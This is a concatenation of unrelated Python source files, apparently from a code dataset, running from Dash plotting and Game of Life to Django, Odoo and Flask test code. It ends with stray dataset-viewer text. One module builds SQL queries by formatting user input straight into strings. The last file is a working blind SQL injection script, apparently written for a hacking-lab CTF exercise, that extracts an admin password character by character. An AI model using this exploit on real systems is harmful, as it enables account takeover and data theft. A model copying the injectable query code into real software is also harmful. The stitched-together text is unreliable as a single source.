elif select_percentile == '10%':
ip = 1
elif select_percentile == '90%':
ip = 2
else:
ip = 3
selected_marker_symbols[ip] = marker_symbol
percentile_color_saved[ip] = picker_percentile_color
# Change Orientation
type_x = None
type_y = None
if (is_vertical):
xaxis_title, yaxis_title = yaxis_title, xaxis_title
type_x = 'log' if is_log else None
if(is_meanshow):
data_list.append(go.Scatter(x=data_mean, y=group_list, mode='markers', name='Mean', marker=dict(symbol=selected_marker_symbols[4], size=symbol_size)))
# Generating Percentiles to Figure
if (is_percentileshow):
data_list.append(go.Scatter(y=group_list, x=percentile_5, mode='markers', name='5%', marker_color=percentile_color_saved[0], marker=dict(symbol=selected_marker_symbols[0], size=symbol_size)))
data_list.append(go.Scatter(y=group_list, x=percentile_10, mode='markers', name='10%', marker_color=percentile_color_saved[1], marker=dict(symbol=selected_marker_symbols[1], size=symbol_size)))
data_list.append(go.Scatter(y=group_list, x=percentile_90, mode='markers', name='90%', marker_color=percentile_color_saved[2], marker=dict(symbol=selected_marker_symbols[2], size=symbol_size)))
data_list.append(go.Scatter(y=group_list, x=percentile_95, mode='markers', name='95%', marker_color=percentile_color_saved[3], marker=dict(symbol=selected_marker_symbols[3], size=symbol_size)))
else:
type_y = 'log' if is_log else None
if(is_meanshow):
data_list.append(go.Scatter(x=group_list, y=data_mean, mode='markers', name='Mean', marker=dict(symbol=selected_marker_symbols[4], size=symbol_size)))
# Generating Percentiles to Figure
if (is_percentileshow):
data_list.append(go.Scatter(x=group_list, y=percentile_5, mode='markers', name='5%', marker_color=percentile_color_saved[0], marker=dict(symbol=selected_marker_symbols[0], size=symbol_size)))
data_list.append(go.Scatter(x=group_list, y=percentile_10, mode='markers', name='10%', marker_color=percentile_color_saved[1], marker=dict(symbol=selected_marker_symbols[1], size=symbol_size)))
data_list.append(go.Scatter(x=group_list, y=percentile_90, mode='markers', name='90%', marker_color=percentile_color_saved[2], marker=dict(symbol=selected_marker_symbols[2], size=symbol_size)))
data_list.append(go.Scatter(x=group_list, y=percentile_95, mode='markers', name='95%', marker_color=percentile_color_saved[3], marker=dict(symbol=selected_marker_symbols[3], size=symbol_size)))
treshold_shape = []
if is_tresholdshow:
treshold_shape.append(dict(line=dict(
# color="rgba(68, 68, 68, 0.5)",
color='rgba({}, {}, {}, {})'.format(
treshold_color['rgb']['r'],
treshold_color['rgb']['g'],
treshold_color['rgb']['b'],
treshold_color['rgb']['a'], ),
width=treshold_size, dash=treshold_style,
),
type='line',
x0=-0.5 if not is_vertical else treshold_value,
x1=len(group_list)-0.5 if not is_vertical else treshold_value,
y0=treshold_value if not is_vertical else -0.5,
y1=treshold_value if not is_vertical else len(group_list)-0.5,
))
# Returning figure
return{
'data': data_list,
'layout': go.Layout(
xaxis=go.layout.XAxis(
title=xaxis_title,
showgrid=gridshow,
zeroline=xzeroline,
type=type_x,
gridwidth=grid_width,
gridcolor='lightgrey',
dtick=dtick if is_vertical else None,
),
yaxis=go.layout.YAxis(
title=yaxis_title,
showgrid=gridshow,
zeroline=yzeroline,
type=type_y,
gridwidth=grid_width,
gridcolor='lightgrey',
dtick=None if is_vertical else dtick,
),
title=main_title,
showlegend=legendshow,
height=graph_height,
width=graph_width,
annotations=annots_ndata,
shapes=treshold_shape,
)
}
if __name__ == '__main__':
app.run_server(debug=True)
|
a = 10 > 5
b = 10 < 5
print("a :", a)
print("b :", b)
print("10 5 ten küçük mü ? :", 10 < 5)
print("10 5 ten büyük mü ? :", 10 > 5)
|
import pathlib
import random
import copy
from typing import List, Optional, Tuple
Cell = Tuple[int, int]
Cells = List[int]
Grid = List[Cells]
class GameOfLife:
def __init__(
self,
size: Tuple[int, int],
randomize: bool=True,
max_generations: Optional[float]=float('inf')
) -> None:
# Размер клеточного поля
self.rows, self.cols = size
# Предыдущее поколение клеток
self.prev_generation = self.create_grid()
# Текущее поколение клеток
self.curr_generation = self.create_grid(randomize=randomize)
# Максимальное число поколений
self.max_generations = max_generations
# Текущее число поколений
self.generations = 1
def create_grid(self, randomize: bool=False) -> Grid:
grid = [[0 for _ in range(self.cols)] for _ in range(self.rows)]
if randomize:
for i in range(self.rows):
for j in range(self.cols):
grid[i][j] = random.randint(0, 1)
return grid
def get_neighbours(self, cell: Cell) -> Cells:
neighbours = []
for i in range(-1, 2):
for j in range(-1, 2):
if 0 <= cell[0] + i < self.rows and 0 <= cell[1] + j < self.cols and (i, j) != (0, 0):
neighbours.append(self.curr_generation[cell[0] + i][cell[1] + j])
return neighbours
def get_next_generation(self) -> Grid:
new_grid = copy.deepcopy(self.curr_generation)
for i in range(self.rows):
for j in range(self.cols):
n = 0
for a in self.get_neighbours((i, j)):
if a:
n += 1
if new_grid[i][j]:
if not 2 <= n <= 3:
new_grid[i][j] = 0
else:
if n == 3:
new_grid[i][j] = 1
return new_grid
def step(self) -> None:
"""
Выполнить один шаг игры.
"""
self.prev_generation = copy.deepcopy(self.curr_generation)
self.curr_generation = self.get_next_generation()
self.generations += 1
@property
def is_max_generations_exceeded(self) -> bool:
"""
Не превысило ли текущее число поколений максимально допустимое.
"""
if self.generations > self.max_generations:
return True
else:
return False
@property
def is_changing(self) -> bool:
"""
Изменилось ли состояние клеток с предыдущего шага.
"""
return not self.curr_generation == self.prev_generation
@staticmethod
def from_file(filename: pathlib.Path) -> 'GameOfLife':
"""
Прочитать состояние клеток из указанного файла.
"""
f = open(filename)
grid = []
row = []
h = 0
for line in f:
row = [int(i) for i in line if i in '01']
grid.append(row)
h += 1
w = len(row)
game = GameOfLife((h, w), False)
game.prev_generation = GameOfLife.create_grid(game)
game.curr_generation = grid
f.close()
return game
def save(self, filename: pathlib.Path) -> None:
"""
Сохранить текущее состояние клеток в указанный файл.
"""
f = open(filename, 'w')
for i in range(self.rows):
for j in range(self.cols):
f.write(str(self.curr_generation[i][j]))
f.write('\n')
f.close()
if __name__ == '__main__':
game = GameOfLife()
game.run() |
from redis import Redis
from rq import Queue
import time
q = Queue(connection=Redis())
from my_module import count_words_at_url
result = []
for i in range(10):
result.append(q.enqueue(count_words_at_url, 'http://nvie.com'))
time.sleep(6)
for r in result:
print(r.result)
|
#!/usr/bin/python2
#coding=utf-8
#Invocation:
# ./drawSingleTransmission.py numTransmissionToPlot
# OR
# ./drawSingleTransmission.py path.csv numTransmissionToPlot
# example: ./drawSingleTransmission.py /home/jordan/MEGA/Universita_mia/Magistrale/Tesi/ns3-cluster/ns-3.26/out/scenario-urbano-con-coord/cw-32-1024/Padova/d25/b0/st500-500/Padova-25-cw-32-1024-b0-st500-500-1550077028283.csv 10
import os
import sys
import getopt
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import csv
import xml.etree.ElementTree as ET
import coordUtils as coordUtils
ns2MobilityFile = "../../maps/Padova/Padova-25.ns2mobility.xml"
polyFilePath = "../../maps/Padova/Padova-25.poly.xml"
plt.rcParams["figure.figsize"] = [10, 10]
circRadius = 1000
baseFolder = "../../ns-3.26/out/scenario-urbano-con-coord/cw-32-1024/Padova/d25/"
def plotSingleTransmission(relativeFileName, outFileBasePath, numTransmissionToPlot=None):
print("Plotting single transmission " + relativeFileName)
startingVehicle = 0
vehicleDistance = 0
txRange = 0
xReceivedCoords = []
yReceivedCoords = []
xNodeCoords = []
yNodeCoords = []
startingX = 0
startingY = 0
transmissionMap = {}
receivedCoordsOnCirc = []
receivedOnCircIds = []
transmissionVector = []
txRange, startingX, startingY, startingVehicle, vehicleDistance, xReceivedCoords, yReceivedCoords, xNodeCoords, yNodeCoords, transmissionMap, receivedCoordsOnCirc, receivedOnCircIds, transmissionVector = coordUtils.parseFile(relativeFileName, ns2MobilityFile)
nodeCoordsMap = {}
color1 = "#840000"
if (numTransmissionToPlot is None):
numTransmissionToPlot = len(transmissionVector) - 1
for i in range(1, numTransmissionToPlot + 1):
plt.plot(xNodeCoords, yNodeCoords, ".", color="red")
coordUtils.plotTxRange(circRadius, startingX, startingY, vehicleDistance, color1, True)
count = 0
print(i)
for edge in transmissionVector:
if (count >= i):
break
count += 1
lineColor = "0.8"
if (count == i - 1):
lineColor = "0.35"
source = edge.source
destination = edge.destination
if (not source in nodeCoordsMap):
nodeCoordsMap[source] = coordUtils.findCoordsFromFile(edge.source, ns2MobilityFile)
if (not destination in nodeCoordsMap):
nodeCoordsMap[destination] = coordUtils.findCoordsFromFile(edge.destination, ns2MobilityFile)
sourceCoord = nodeCoordsMap[source]
destCoord = nodeCoordsMap[destination]
c1 = np.array((sourceCoord.x, sourceCoord.y, sourceCoord.z))
c2 = np.array((destCoord.x, destCoord.y, destCoord.z))
plt.plot(sourceCoord.x, sourceCoord.y, "ro", color="#af41f4", markersize=5)
plt.plot([sourceCoord.x, destCoord.x], [sourceCoord.y, destCoord.y], color=lineColor, linewidth=0.3, alpha=0.7)
plt.plot(destCoord.x, destCoord.y, ".", color="green", markersize=5)
plt.plot(startingX, startingY, "ro", color="blue", markersize=5)
coordUtils.plotTxRange(circRadius, startingX, startingY, vehicleDistance, color1, True)
#coordUtils.plotBuildings(polyFilePath)
#Save file
if not os.path.exists(os.path.dirname(outFileBasePath)):
try:
os.makedirs(os.path.dirname(outFileBasePath))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
plt.savefig(outFileBasePath + "-transmission" + str(i) + ".pdf")
plt.clf()
def main():
print("Draw single transmissions")
relativeFileName = sys.argv[1]
numTransmissionToPlot = None
if (len(sys.argv) > 2):
numTransmissionToPlot = int(sys.argv[2])
plotSingleTransmission(relativeFileName, "./out/singlefileSingleTransmission/singleTransmission", numTransmissionToPlot)
if __name__ == "__main__":
main()
|
import strawberry
from fruit.mutation import FruitMutations
from fruit.query import FruitQueries
from garden.query import GardenQueries
@strawberry.type(description='Root query to house all other queries.')
class RootQuery(FruitQueries, GardenQueries):
""" Root GraphQL query. """
@strawberry.type(description='Root mutation to house all other mutations.')
class RootMutation(FruitMutations):
""" Root GraphQL mutation. """
schema = strawberry.Schema(query=RootQuery, mutation=RootMutation)
|
#!/usr/bin/env python
#coding: utf-8
import json
from models import execute_sql
from models import select_all_result
from models import select_one_result
rememberme='./rememberme'
#def rememberMe(saveuser):
# users = []
# users.append(saveuser)
# with open(rememberme, 'w') as fd:
# fd.write(json.dumps(users))
#
#
#def getRememberMe():
# try:
# with open(rememberme,'r') as fd:
# users = json.loads(fd.read())
# except Exception as e:
# users= []
# return users
def register(data):
sql = '''INSERT INTO users(username, email, password) values('%s', '%s', '%s')''' % (data['username'], data['email'], data['password'])
print sql
return execute_sql(sql)
def get_users():
sql = '''SELECT * FROM users '''
return select_all_result(sql)
def login_check(name,password):
sql = '''SELECT * FROM users WHERE username = '%s' and password = '%s';''' % (name,password)
print sql
return select_one_result(sql)
def get_user(name):
sql = '''SELECT * FROM users WHERE username = '%s';''' % name
return select_one_result(sql)
def get_email(email):
sql = '''SELECT * FROM users WHERE email = '%s';''' % email
return select_one_result(sql)
def get_user_id(uid):
sql = '''SELECT * FROM users WHERE id = '%d';''' % uid
return select_one_result(sql)
def userDel(uid):
sql = '''DELETE FROM users WHERE id = %s; ''' % uid
print sql
return execute_sql(sql)
def userUpdate(data):
sql = '''UPDATE users set username='%s',password='%s',email='%s' WHERE id = %d;''' % (data['username'],data['password'],data['email'],data['id'])
print 'update:' + sql
return execute_sql(sql)
def cleanup():
close_db()
if __name__ == '__main__':
print "__name__", __name__
s = ssum(3, 2)
print "common ssum: ", s
|
import os
import configparser
class ConfigReader:
def __init__(self,path):
self.cf = configparser.ConfigParser()
self.cf.read(path)
def getDataSourceType(self):
return self.cf.get("BasicConfig", "dataSourceType")
|
# 猜数字
# 以后注意不要if套if,合适的运用if或while
import random
# import math
num = random.randint(1, 10)
#优化为for循环
for i in range(1, 10):
guess = int(input('请输入1-10的数字:\n'))
if guess != num:
#for循环中的i本身就是自加的
#i = i + 1
if guess > num:
print("Lower please")
else:
print("Greater please")
else:
if i == 1:
print("You got it at the first time!!!")
else:
#注意python自带的format方法
print("You got it in {} times".format(i))
|
import base as bs
import modified as md
import base_with_rec as rec
from itertools import combinations
import time
def result_test():
l = ["Январь",
"Февраль",
"Март",
"Апрель",
"Май",
"Июнь",
"Июль",
"Август",
"Сентябрь",
"Октябрь",
"Ноябрь",
"Декабрь"]
print("Расстояние Левенштейна между строками:\n")
for i in combinations(l, 2):
a = bs.distance(i[0], i[1])
b = rec.distance(i[0], i[1])
c = md.distance(i[0], i[1])
# print(i[0], " & ", i[1], "& ", a, " ", b, " ", c, " & ", a, " ", b, " ", c, r" & V \\\hline")
print(i[0], " - ", i[1], ": ", a, " ", b, " ", c)
def time_test():
t1, t2, t3 = 0, 0, 0
s1 = "aaaaaa"
for i in range(10):
s2 = "a" * (7 - i) + "b" * i
for j in range(100):
start = time.time()
a = bs.distance(s1, s2)
stop = time.time()
t1 += (stop - start)
start = time.time()
b = md.distance(s1, s2)
stop = time.time()
t2 += (stop - start)
start = time.time()
c = rec.distance(s1, s2)
stop = time.time()
t3 += (stop - start)
print("{0:f} {1:f} {2:f} {3}{4}{5}".format(t1/100*1000, t2/100*1000, t3/100*1000, a, b, c))
if __name__ == "__main__":
# result_test()
time_test() |
test = 'test str'
print(test.encode('utf_8')) # 编码
test = bytes('test', encoding='utf_8')
print(test[:2])
# memoryview 用于访问其他二进制序列、打包的数组和缓冲中的数据切片,是共享内存而非复制字节序列
# chardet库可以用于检测字节序列的编码
# 不能依赖默认编码
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-26 15:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('web_soluciones', '0003_itemsolucion'),
]
operations = [
migrations.AlterModelOptions(
name='itemsolucion',
options={'verbose_name': 'Item Solución', 'verbose_name_plural': 'Items Soluciones'},
),
migrations.AddField(
model_name='solucion',
name='slug',
field=models.SlugField(blank=True, null=True),
),
]
|
import os
replayList = os.listdir('replays')
#replayList = os.listdir('.')
#replayList.remove('map_counter.py')
for i in range(len(replayList)):
splittedReplayName = replayList[i].split('_')
for l in range(1, len(splittedReplayName)):
if splittedReplayName[-l].isdigit() == True:
temp = "_".join(splittedReplayName[-l:]).replace('.wotreplay', '')
break
replayList[i] = temp
mapCount = dict()
for map in replayList:
mapCount[map] = mapCount.get(map, 0) + 1
#print mapCount
resultList = list()
for m in mapCount:
resultList.append( (mapCount[m], m) )
resultList.sort()
print "Total number of battles is " + str(len(replayList)) + ":"
for i in resultList[::-1]:
print str(i[0]) + ' is count of "' + i[1] + '"'
raw_input("Press Enter.")
|
# -*- coding: utf-8 -*-
# © 2018 Cousinet Eloi (Open Net Sarl)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import api, fields, models, _
from datetime import datetime
from datetime import timedelta
import logging
_logger = logging.getLogger(__name__)
class Followup(models.Model):
_name = "followup.followup"
_description = "Account Follow-up"
##########
# Fields #
##########
name = fields.Char(
string='Name',
related='company_id.name',
readonly='True'
)
company_id = fields.Many2one(
'res.company',
'Company',
required='True',
default=lambda self: self.env['res.company']._company_default_get('followup.followup')
)
followup_line = fields.One2many(
'followup.followup_line',
'followup_id',
string='Follow-up'
)
class FollowupLine(models.Model):
_name = "followup.followup_line"
_description = "Follow-up criteria"
_order = 'delay'
##########
# Fields #
##########
name = fields.Char(
string='Follow-up Action',
required='True'
)
sequence = fields.Integer(
string='Sequence',
help="Gives the sequence order when displaying a list of follow-ups lines."
)
delay = fields.Integer(
string='Due days',
help="The number of days after the due date of the invoice to wait before sending the reminder. Could be negative if you want to send a polite alert beforehand.",
required=True
)
followup_id = fields.Many2one(
'followup.followup',
string='Follow-up',
required=True,
ondelete='cascade'
)
description = fields.Text(
string='Printed Message',
translate=True,
default="""
Exception made if there was a mistake of ours, it seems that the following amount stays unpaid. Please, take appropriate measures in order to carry out this payment in the next 8 days.
Would your payment have been carried out after this mail was sent, please ignore this message. Do not hesitate to contact our accounting department.
Best Regards,
"""
)
action = fields.Selection([
('email', 'Send an email'),
('letter', 'Send a letter'),
('manual', 'Manual action')
])
manual_action_note = fields.Text(
string='Action To Do',
placeholder="e.g. Give a phone call, check with others, ..."
)
manual_action_responsible_id = fields.Many2one(
'res.users',
string="Assign a responsible",
ondelete='set null'
)
email_template_id = fields.Many2one(
'mail.template',
string='Email Template',
ondelete='set null',
)
@api.model
def create(self, values):
rec = super(FollowupLine, self).create(values)
for record in self.env['account.move.line'].search([
('full_reconcile_id', '=', False), ('account_id.deprecated', '=', False), ('account_id.internal_type', '=', 'receivable'), ('amount_residual', '>', 0)
]):
record._compute_next_follow_line_id()
return rec
@api.multi
def write(self, values):
rec = super(FollowupLine, self).write(values)
for record in self.env['account.move.line'].search([
('full_reconcile_id', '=', False), ('account_id.deprecated', '=', False), ('account_id.internal_type', '=', 'receivable'), ('amount_residual', '>', 0)
]):
record._compute_next_follow_line_id()
return rec
class AccountMoveLine(models.Model):
_inherit = 'account.move.line'
##########
# Fields #
##########
follow_line_id = fields.Many2one(
'followup.followup_line',
string='Follow-up Level',
ondelete='restrict'
)
follow_date = fields.Datetime(
string='Latest Follow-up'
)
amount_total = fields.Monetary(
related="invoice_id.amount_total",
readonly=True
)
residual = fields.Monetary(
related="invoice_id.residual",
readonly=True
)
####################
# Computed methods #
####################
@api.model
def _default_next_follow_line_id(self):
return self.env['followup.followup_line'].search([], limit=1, order='delay asc')
@api.depends('follow_line_id', 'date_maturity')
def _compute_next_follow_line_id(self):
for account_move_line in self.env['account.move.line'].search([
('id', 'in', list(map(lambda x: x.id, self))),
('full_reconcile_id', '=', False), ('account_id.deprecated', '=', False), ('account_id.internal_type', '=', 'receivable'), ('amount_residual', '>', 0)
]):
if account_move_line.follow_line_id:
account_move_line.next_follow_line_id = self.env['followup.followup_line'].search([
('delay', '>', account_move_line.follow_line_id.delay)],
limit=1,
order='delay asc'
)
if not account_move_line.next_follow_line_id:
account_move_line.next_follow_line_id = self.env['followup.followup_line'].search([], limit=1, order='delay desc')
else:
account_move_line.next_follow_line_id = self.env['followup.followup_line'].search([], limit=1, order='delay asc')
@api.depends('next_follow_line_id')
def _compute_next_followup_date(self):
for account_move_line in self:
date = datetime.strptime(account_move_line.date_maturity, '%Y-%m-%d')
date = date + timedelta(days=account_move_line.next_follow_line_id.delay)
account_move_line.next_followup_date = date
@api.multi
def _compute_day_late(self):
for account_move_line in self:
delta = datetime.today() - datetime.strptime(account_move_line.date_maturity, '%Y-%m-%d')
account_move_line.day_late = delta.days
############
# Computed #
############
next_followup_date = fields.Datetime(
compute=_compute_next_followup_date,
default=False,
store=True
)
next_follow_line_id = fields.Many2one(
'followup.followup_line',
# default=_default_next_follow_line_id,
compute=_compute_next_follow_line_id,
store=True
)
day_late = fields.Integer(
compute=_compute_day_late,
store=False
)
@api.multi
def write(self, values):
for key in values.keys():
if key not in ['follow_line_id', 'next_follow_line_id', 'follow_date', 'install_mode_data']:
return super(AccountMoveLine, self).write(values)
return super(AccountMoveLine, self.with_context(bypass_date_verif=True)).write(values)
class AccountMove(models.Model):
_inherit = "account.move"
@api.multi
def _check_lock_date(self):
if self._context.get('bypass_date_verif'):
return True
return super(AccountMove, self)._check_lock_date()
class ResPartner(models.Model):
_inherit = 'res.partner'
@api.one
def _get_account_move_line_letter(self):
lines = self.env['account.move.line'].search(
[('partner_id', '=', self.id),
('next_follow_line_id.action', 'in', ['letter', 'manual']),
('id', 'in', self._context.get('active_ids', [])),
('blocked', '=', False)],
order="next_followup_date asc"
)
self.account_move_line_letter_id = lines
return lines
###################
# Computed fields #
###################
account_move_line_letter_id = fields.One2many(
'account.move.line',
compute=_get_account_move_line_letter,
store=False
)
|
'''This is test module for pushing product
and caculate the mean of product in streaming'''
import os
import tempfile
import unittest
import db
import route
class ProductTestCase(unittest.TestCase):
'''
The class contains all tests:
- Test input
not valid
out of range
- Test accuracy of result
Attributes:
app (str): FlaskClient to test
db_temp (file object): file object to open database file from temp, deleted when finishing
'''
def setUp(self):
#print(self._testMethodName)
self.db_temp, db.DATABASE = tempfile.mkstemp()
self.app = route.APP.test_client()
self.app.get('/api/init_db')
def tearDown(self):
os.close(self.db_temp)
def test_product_not_int(self):
'''test pushing a product with score is a float (not integer) (score = 2.3)'''
json_response = self.app.post('/api/push', json={
'UUID': 'a1-b1', 'score': 2.3
}).get_json()
self.assertEqual(json_response, route.ERROR_VALIDATE)
def test_product_score_out_of_range(self):
'''test pushing a product with out of range score <0 or >5 (score =6)'''
json_response = self.app.post('/api/push', json={
'UUID': 'a1-b1', 'score': 6
}).get_json()
self.assertEqual(json_response, route.ERROR_VALIDATE)
def test_push_product_three_times(self):
'''test pushing a product with 3 different score'''
json_response = self.app.post('/api/push', json={
'UUID': 'a1-b1', 'score': 5
}).get_json()
self.assertEqual(json_response, {'UUID': 'a1-b1', 'mean': 5})
json_response = self.app.post('/api/push', json={
'UUID': 'a1-b1', 'score': 3
}).get_json()
self.assertEqual(json_response, {'UUID': 'a1-b1', 'mean': 4})
json_response = self.app.post('/api/push', json={
'UUID': 'a1-b1', 'score': 4
}).get_json()
self.assertEqual(json_response, {'UUID': 'a1-b1', 'mean': 4})
if __name__ == '__main__':
unittest.main()
|
#google
from googlesearch import search
import webbrowser as wb
import text_speech
def play():
text_speech.say("What do you want to listen:")
song = raw_input()
query="play "+song+" sound cloud"
for url in search(query , tld="com", num=1, stop=1, pause=2):
wb.open_new_tab(url)
|
str=raw_input()
[n,mod]=[int(n) for n in str.split()]
ans=1
for i in range(1,n+1):
ans*=i
ans%=mod
print ans
|
#!/usr/bin/python3
import requests
import string
s_space = string.digits + string.ascii_lowercase + string.ascii_uppercase + string.punctuation
#assumes account t:t exists
def check_inj(st):
print(st)
r = requests.post("https://blind.idocker.hacking-lab.com/index.php", data={'username':"t' AND " + st +" --", 'password':'t'})
return "as t" in r.text
def get_len():
lmiddle = -1
found = False
mi = 0
middle = 25
ma = 50
while(not found):
if(check_inj(str(middle) + "> (SELECT length(password) FROM users WHERE name = 'admin')")):
ma = middle
if(middle == lmiddle):
return mi
else:
mi = middle
if(middle == lmiddle):
return middle
lmiddle = middle
middle = (mi + ma) // 2
def check_char(index):
lmiddle = -1
mi = 33
ma = 126
middle = ma//2
while(True):
if(check_inj("'" + chr(middle) + "' " + "> (SELECT substr(password, " + str(index) + ", 1) FROM users WHERE name='admin')")):
ma = middle
if(middle == lmiddle):
return ma
else:
mi = middle
if(middle == lmiddle):
return mi
lmiddle = middle
middle = (mi + ma) // 2
print("STATS")
print(mi, ma, middle)
str_len = get_len()
print("FLAG LEN: " + str(str_len))
flag = ""
while(len(flag) != str_len):
flag += chr(check_char(len(flag) + 1))
print(flag)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.